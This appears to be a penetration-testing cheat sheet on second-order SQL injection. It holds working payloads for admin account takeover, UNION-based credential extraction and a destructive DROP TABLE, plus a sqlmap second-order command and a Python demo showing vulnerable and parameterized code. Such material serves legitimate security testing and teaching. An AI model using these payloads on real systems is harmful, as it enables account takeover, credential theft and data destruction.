
Overview

The payload is stored in the database (for example at registration or on a profile update) and executed later, when another feature reads it back and uses it in a SQL query without sanitization. The input is sanitized on insert but trusted, and not sanitized, on retrieval.

How It Works

1. Attacker registers username: admin'-- -
2. Application stores it safely (parameterized INSERT)
3. Later, application uses stored username in another query:
   SELECT * FROM users WHERE username='admin'-- -'
4. Injection triggers on the second query

Common Injection Points

Store here      Triggers here
Username        Profile page, password reset, admin panel
Email           Notification system, search, export
Address         Order processing, invoice generation
Comment         Admin review panel, moderation page
Filename        File listing, download feature

Example — Password Reset

Register

Username: admin'-- -
Password: anything

Trigger — Change Password

Application runs:
UPDATE users SET password='newpass' WHERE username='admin'-- -'
Result: admin password changed to newpass.
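The password-reset flow above, reproduced as an added example (not code from the original page) against a constructed in-memory SQLite table: the INSERT is parameterized, so nothing fires at registration, but the later UPDATE concatenates the username it read back from the database. The fixed variant binds the stored value as a parameter on the second query as well, which is the mitigation.

```python
import sqlite3

# Constructed sample schema, not from the original page: one pre-existing
# "admin" account whose password the stored payload reaches.
def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'original')")
    return db

def register(db: sqlite3.Connection, username: str, password: str) -> int:
    # Store step: the INSERT is parameterized, so admin'-- - is saved verbatim
    # as data and nothing happens yet. Returns the new row id (the "session").
    cur = db.execute("INSERT INTO users VALUES (?, ?)", (username, password))
    return cur.lastrowid

def change_password_vulnerable(db: sqlite3.Connection, username: str, new_password: str) -> None:
    # Trigger step: the username came from the database, so it was trusted
    # and concatenated into the WHERE clause; the comment eats the closing quote.
    db.execute(f"UPDATE users SET password=? WHERE username='{username}'", (new_password,))

def change_password_fixed(db: sqlite3.Connection, username: str, new_password: str) -> None:
    # Mitigation: bind every value on every query, whatever its origin.
    db.execute("UPDATE users SET password=? WHERE username=?", (new_password, username))

def password_of(db: sqlite3.Connection, username: str) -> str:
    row = db.execute("SELECT password FROM users WHERE username=?", (username,)).fetchone()
    return row[0]

def run(change_password) -> tuple:
    """Register the attacker, then let them change their *own* password.
    Returns (admin's password, attacker's password) afterwards."""
    db = make_db()
    attacker = "admin'-- -"
    uid = register(db, attacker, "anything")
    # The application reads the logged-in user's name back from the table.
    stored = db.execute("SELECT username FROM users WHERE rowid=?", (uid,)).fetchone()[0]
    change_password(db, stored, "newpass")
    return password_of(db, "admin"), password_of(db, attacker)

if __name__ == "__main__":
    print("vulnerable:", run(change_password_vulnerable))  # ('newpass', 'anything')
    print("fixed:     ", run(change_password_fixed))       # ('original', 'newpass')
```

The vulnerable path changes admin's password while leaving the attacker's own row untouched, which is exactly the signal the Testing Methodology section tells you to monitor for; the fixed path only touches the row whose username is literally admin'-- -.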

Example — Profile Update

Register

Username: ' UNION SELECT username,password FROM users-- -

Trigger

Application displays profile with:
SELECT bio FROM profiles WHERE username='' UNION SELECT username,password FROM users-- -'

Example — Data Exfiltration

Store

Name: ' OR 1=1 UNION SELECT group_concat(username,0x3a,password) FROM users-- -

Trigger

The payload fires wherever the stored value is used in a query: an admin dashboard, a CSV export, or an email notification that renders the field.

Testing Methodology

  1. Identify all input fields that store data
  2. Inject payloads in each field (registration, profile, settings)
  3. Navigate to every feature that reads those fields
  4. Monitor for SQL errors or unexpected data
  5. Check admin panels, reports, search, export features

Useful Payloads

admin'-- -
admin' AND 1=1-- -
admin' UNION SELECT NULL-- -
' OR '1'='1
test'); DROP TABLE temp;-- -

SQLmap Second-Order

sqlmap -r request.txt --second-url="http://TARGET/profile" --batch
-r request.txt is the request that stores the payload; --second-url is the page where the stored payload is triggered.

Quick Reference

Step            Action
Store           Inject payload via registration/profile/settings
Trigger         Visit page that queries stored data
Password reset  Register as admin'-- -, change password
SQLmap          --second-url="http://TARGET/trigger-page"
